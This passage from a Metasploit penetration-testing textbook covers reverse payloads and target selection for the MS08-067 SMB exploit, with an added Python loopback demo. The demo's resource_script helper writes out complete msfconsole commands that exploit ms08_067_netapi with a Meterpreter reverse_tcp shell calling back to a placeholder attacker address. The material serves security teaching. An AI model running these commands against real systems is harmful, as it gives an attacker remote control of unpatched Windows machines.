Chapter 5
Notice that when the payload is selected and its options are displayed, we are presented with some additional options in the payload section, such as LHOST and LPORT. In this example, you could configure the payload to connect back to the attacker machine on a specific IP address and port number; this is called a reverse payload. With a reverse payload the connection is initiated by the target machine, which connects out to the attacker. You might use this technique to get around a firewall or NAT device that blocks inbound connections to the target but still permits outbound ones. We'll configure this exploit with both the LHOST and RHOST options: the target machine (RHOST) will connect back to our attacking machine (LHOST) on the default TCP port (4444, the LPORT value).
msf> show targets
Modules often list the potential targets they can exploit. For example, because the vulnerability targeted by MS08-067 relies on hard-coded memory addresses, the exploit is specific to operating systems with specific patch levels, language versions, and security implementations (as explained in detail in Chapters 14 and 15). Using the show targets command at the ms08_067_netapi exploit prompt displays a list of 60 exploit targets (only a portion is shown in the following example). The success of the exploit will depend on the version of Windows you are targeting. Sometimes automatic detection will not work and could even select the wrong target, which will usually crash the service.
msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)
   5   Windows 2003 SP0 Universal
   6   Windows 2003 SP1 English (NO NX)
   7   Windows 2003 SP1 English (NX)
   8   Windows 2003 SP2 English (NO NX)
   9   Windows 2003 SP2 English (NX)
In this example, you can see that the exploit lists Automatic Targeting as one option. Often, an exploit module will attempt to target the operating system automatically, fingerprinting the remote system and selecting the matching target based on its version. However, it's often best to identify the appropriate target yourself, to avoid triggering the wrong exploit or a potentially destructive one.
NOTE
This particular exploit is temperamental, and it has a tough time determining the operating system. If you use this exploit, be sure to set the target explicitly to the operating system you are testing against on your VM (Windows XP SP2, shown above as target 3, Windows XP SP2 English (NX)).
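The following Python script is an added illustration of the two points above (the reverse-payload connection direction, and configuring the module with an explicit target instead of Automatic Targeting); it is not code from the book or from the Metasploit project. The handler half listens on LHOST:LPORT exactly as a Metasploit handler does, and the target half initiates the TCP connection back to it, so the listener's accept() only returns once the target dials in. The "target" answers a tiny fixed protocol rather than executing commands, so the whole thing is safe to run on loopback. The resource_script helper emits the msfconsole commands (use, set, exploit) for ms08_067_netapi with a reverse payload; the 192.168.1.x addresses in it are placeholders, not real hosts.

```python
import platform
import socket
import threading

# Constructed example: everything runs locally on the loopback interface.
# The "target" half stands in for a reverse payload; it answers a tiny fixed
# protocol instead of executing shell commands.

RHOST_EXAMPLE = "192.168.1.20"   # placeholder target address (assumed)
LHOST_EXAMPLE = "192.168.1.10"   # placeholder attacker address (assumed)


def resource_script(rhost, lhost, lport=4444, target_id=3):
    """msfconsole resource-script lines for ms08_067_netapi with a reverse
    payload and an explicit target (3 = Windows XP SP2 English (NX))."""
    return [
        "use exploit/windows/smb/ms08_067_netapi",
        f"set RHOST {rhost}",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        f"set TARGET {target_id}",   # skip Automatic Targeting (id 0)
        "exploit",
    ]


def local_sysinfo():
    """What the simulated target reports for the 'sysinfo' request."""
    return platform.system()


def target_callback(lhost, lport):
    """Target side of a reverse payload: connect OUT to LHOST:LPORT, then
    serve requests until told to exit. No command execution takes place."""
    with socket.create_connection((lhost, lport), timeout=5) as sock:
        f = sock.makefile("rw", encoding="utf-8")
        for line in f:
            cmd = line.strip()
            if cmd == "sysinfo":
                f.write(local_sysinfo() + "\n")
            elif cmd == "exit":
                f.write("bye\n")
                f.flush()
                return
            else:
                f.write("unknown\n")
            f.flush()


def run_handler(lhost="127.0.0.1", lport=0):
    """Attacker side: the listener the payload calls back to. LPORT=0 lets
    the OS pick a free port so the demo never collides with a real handler
    on 4444. Returns details of the exchange."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((lhost, lport))
    listener.listen(1)
    listener.settimeout(5)
    bound_host, bound_port = listener.getsockname()

    # Stand-in for the exploit firing on the target: the payload connects back.
    target = threading.Thread(target=target_callback,
                              args=(bound_host, bound_port))
    target.start()

    conn, peer = listener.accept()   # returns only once the target dials in
    listener.close()
    conn.settimeout(5)
    with conn:
        f = conn.makefile("rw", encoding="utf-8")
        f.write("sysinfo\n")
        f.flush()
        sysinfo = f.readline().strip()
        f.write("exit\n")
        f.flush()
        goodbye = f.readline().strip()
    target.join(5)
    return {
        "lport": bound_port,       # port the attacker listened on (LPORT)
        "peer_port": peer[1],      # target's ephemeral source port
        "sysinfo": sysinfo,
        "goodbye": goodbye,
    }


if __name__ == "__main__":
    print("\n".join(resource_script(RHOST_EXAMPLE, LHOST_EXAMPLE)))
    print(run_handler())
```

Note the roles: the attacker never connects to the target; it only binds and waits, which is why a reverse payload works through a firewall or NAT that drops inbound connections to the victim. The resource script lines can be saved to a file and loaded with msfconsole's -r option, and setting TARGET explicitly is the equivalent of the advice in the note above.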